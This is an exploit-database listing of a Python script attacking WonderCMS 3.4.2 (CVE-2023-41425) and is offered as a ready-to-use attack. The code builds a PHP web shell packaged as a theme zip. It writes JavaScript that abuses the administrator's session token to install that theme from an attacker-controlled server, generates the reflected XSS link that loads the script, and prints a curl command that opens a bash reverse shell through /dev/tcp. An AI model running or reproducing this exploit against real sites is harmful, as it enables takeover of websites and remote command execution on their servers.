Exploit for WonderCMS 3.4.2 Cross Site Scripting / Code Execution CVE-2023-41425

Name: Exploit for WonderCMS 3.4.2 Cross Site Scripting / Code Execution CVE-2023-41425
Rating: 5 (93 reviews)
2025-04-21 | CVSS 6.1
## https://sploitus.com/exploit?id=PACKETSTORM:190575
# Exploit Title: WonderCMS v3.4.2 XSS to RCE
    # Date: 2025-04-16
    # Exploit Author: Milad Karimi (Ex3ptionaL)
    # Contact: miladgrayhat@gmail.com
    # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
    # MiRROR-H: https://mirror-h.org/search/hacker/49626/
    # CVE: CVE-2023-41425
    
    import requests
    import argparse
    from argparse import RawTextHelpFormatter
    import os
    import subprocess
    import zipfile
    from termcolor import colored
    
    def main():
        parser = argparse.ArgumentParser(description="Exploit Wonder CMS v3.4.2
    XSS to RCE", formatter_class=RawTextHelpFormatter)
        parser.add_argument("--url", required=True, help="Target URL of
    loginURL (Example: http://sea.htb/loginURL)")
        parser.add_argument("--xip", required=True, help="IP for HTTP web
    server that hosts the malicious .js file")
        parser.add_argument("--xport", required=True, help="Port for HTTP web
    server that hosts the malicious .js file")
        args = parser.parse_args()
    
        target_login_url = args.url
        target_split = args.url.split('/')
        target_url = target_split[0] + '//' + target_split[2]
    
        # Web Shell
        print("[+] Creating PHP Web Shell")
        if not os.path.exists('malicious'):
            os.mkdir('malicious')
            with open ('malicious/malicious.php', 'w') as f:
                f.write('<?php system($_GET["cmd"]); ?>')
            with zipfile.ZipFile('./malicious.zip', 'w') as z:
                z.write('malicious/malicious.php')
            os.remove('malicious/malicious.php')
            os.rmdir('malicious')
        else:
            print(colored("[!] Directory malicious already exists!", 'yellow'))
    
        # Malicious .js
        js = f'''var token =
    document.querySelectorAll('[name="token"]')[0].value;
    var module_url =
    "{target_url}/?installModule=http://{args.xip}:{args.xport}/malicious.zip&directoryName=pwned&type=themes&token="
    + token;
    var xhr = new XMLHttpRequest();
    xhr.withCredentials = true;
    xhr.open("GET", module_url);
    xhr.send();'''
    
        print("[+] Writing malicious.js")
        with open('malicious.js', 'w') as f:
            f.write(js)
    
    
        xss_payload = args.url.replace("loginURL",
    "index.php?page=loginURL?")+"\"></form><script+src=\"http://
    "+args.xip+":"+args.xport+"/malicious.js\"></script><form+action=\""
        print("[+] XSS Payload:")
        print(colored(f"{xss_payload}", 'red'))
    
        print("[+] Web Shell can be accessed once .zip file has been
    requested:")
    
    print(colored(f"{target_url}/themes/malicious/malicious.php?cmd=<COMMAND>",
    'red'))
        print("[+] To get a reverse shell connection run the following:")
        print(colored(f"curl -s '{target_url}/themes/malicious/malicious.php'
    --get --data-urlencode \"cmd=bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT>
    0>&1'\" ", 'yellow'))
    
        print("[+] Starting HTTP server")
        subprocess.run(["python3", "-m", "http.server", "-b", args.xip,
    args.xport])
    
    if __name__ == "__main__":
        main()